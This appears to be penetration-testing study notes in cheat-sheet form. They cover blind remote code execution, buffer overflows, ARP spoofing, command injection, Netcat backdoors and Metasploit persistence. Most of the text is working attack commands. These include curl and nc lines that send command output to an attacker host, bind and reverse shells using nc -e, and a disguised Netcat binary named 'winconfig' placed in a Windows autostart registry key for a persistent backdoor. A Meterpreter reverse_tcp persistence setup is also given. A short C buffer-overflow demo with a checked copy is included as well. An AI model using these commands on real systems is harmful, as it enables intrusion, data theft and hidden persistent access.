Exploitation
Remote Code Execution (RCE)
Allows an attacker to execute code of their choice on the web application's server.
There are many ways to do this; the following are aimed at blind code execution, where the command output is not returned in the response:
curl http://<attacker_ip>:<port>/<cmd_to_try>
If the returned output contains spaces, we can base64-encode the result and then decode it on our system.
On our system, we set up a Netcat listener - nc -lvp <port>
If RCE exists, we will see the output of the command on the listener.
Buffer Overflow Attacks
A buffer overflow attack works by taking control of the execution flow of a piece of software. Being able to force an application to behave differently from how it was designed can lead to:
An app or OS crash, causing a denial of service (DoS)
Privilege Escalation
Remote Code Execution (RCE)
Security features bypass
Buffers
A buffer is an area of RAM reserved for temporary data storage, for example for:
User input
Parts of a video file
Server banners
Buffers have a finite size, which means they can only hold a limited amount of data. If a client-server app is designed to accept only an 8-character username, the username buffer will be 8 bytes long.
Buffers are stored in a data structure in computer memory known as the stack. Data is added to and removed from the stack in Last In, First Out (LIFO) order:
Push: add an element to the stack
Pop: removes the last inserted element
Modern operating systems still use LIFO, but an app can also randomly access a position on the stack to read or write data. To save space for later use, the app can reserve memory allocations on the stack and access them directly.
A raw overflow that simply overwrites memory will crash an app, while a well-engineered attack is able to execute code.
A deep understanding of Assembly code is recommended!
https://wiki.skullsecurity.org/index.php?title=Fundamentals
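As an added illustration (not part of these notes), the C program below models the 8-byte username buffer described above next to an adjacent 8-byte field in the same 16-byte region, shows that an unchecked copy of a 12-byte input silently overwrites that neighbour, and shows the length check that prevents it. The region layout, the "RETADDR!" marker and the input are constructed for the demo.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed demo: a 16-byte region stands in for a slice of the stack. The
 * 8-byte username buffer is at offset 0; the 8 bytes after it hold an adjacent
 * field (think of a saved return address) that an overflow reaches first. */
#define NAME_LEN 8
#define FRAME_LEN 16
static const char ADJACENT_ORIG[] = "RETADDR!";   /* 8 bytes, compared below */

static void frame_init(unsigned char *frame) {
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + NAME_LEN, ADJACENT_ORIG, NAME_LEN);
}

/* Defective copy: trusts the caller's length, so bytes 9..len land in the
 * adjacent field. Clamped to the frame only so the demo stays in bounds. */
static void copy_unchecked(unsigned char *frame, const char *input, size_t len) {
    if (len > FRAME_LEN) len = FRAME_LEN;
    memcpy(frame, input, len);
}

/* Hardened copy: refuse anything that does not fit the 8-byte buffer. */
static bool copy_checked(unsigned char *frame, const char *input, size_t len) {
    if (len > NAME_LEN) return false;
    memcpy(frame, input, len);
    return true;
}

/* True while the field next to the buffer still holds its original value. */
static bool adjacent_intact(const unsigned char *frame) {
    return memcmp(frame + NAME_LEN, ADJACENT_ORIG, NAME_LEN) == 0;
}

int main(void) {
    unsigned char frame[FRAME_LEN];
    const char *input = "AAAAAAAAAAAA";   /* 12 bytes: 4 more than fit */
    frame_init(frame);
    copy_unchecked(frame, input, strlen(input));
    printf("unchecked: neighbour intact? %s\n", adjacent_intact(frame) ? "yes" : "no");
    frame_init(frame);
    bool ok = copy_checked(frame, input, strlen(input));
    printf("checked: accepted? %s, neighbour intact? %s\n",
           ok ? "yes" : "no", adjacent_intact(frame) ? "yes" : "no");
    return 0;
}
```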
Impacket
lookupsid.py anonymous@<IP>
ARP spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
Command Injection
If you can execute commands on a server, you can pipe the output of a command to Netcat, e.g.:
ls -la | nc {VPN_IP} {PORT}
This will send the output of ls -la to your Netcat listener.
Netcat's -e flag executes a program for each incoming connection, so the following lets whoever connects to the server run commands on it:
nc -lvp <PORT> -e /bin/bash
Backdoors
Netcat
The victim has the listener, so we can get a shell with:
ncat <victim_IP> <port>
The attacker has the listener:
ncat -lvp <port> -v
On the victim's machine, we connect to the attacker IP and we should have access to a shell!
Persistent backdoor
On the attacker machine we run:
ncat -l -p <port> -v
On the victim machine, we need to add Netcat (renamed winconfig in this case) to the appropriate registry autostart key so it runs on boot.
On Windows, in the Registry Editor, add an entry with the name winconfig and the value "PATH TO winconfig.exe <attacker_ip> <port> -e cmd.exe".
From a defender's point of view, an autostart value that launches a renamed binary with a remote IP, a port and -e cmd.exe is exactly the kind of registry entry to hunt for.
Metasploit
If we already have a Meterpreter session on the victim's machine:
Find the module: s4u_persistence
Set the options:
set SESSION {id}
set TRIGGER logon
set PAYLOAD to a meterpreter reverse_tcp payload
set LHOST {local_host} and set LPORT {port}
run -j
Then set up a listener using the handler exploit: set the payload, LHOST and LPORT, and launch it with either of:
exploit | run -j
Both commands will work.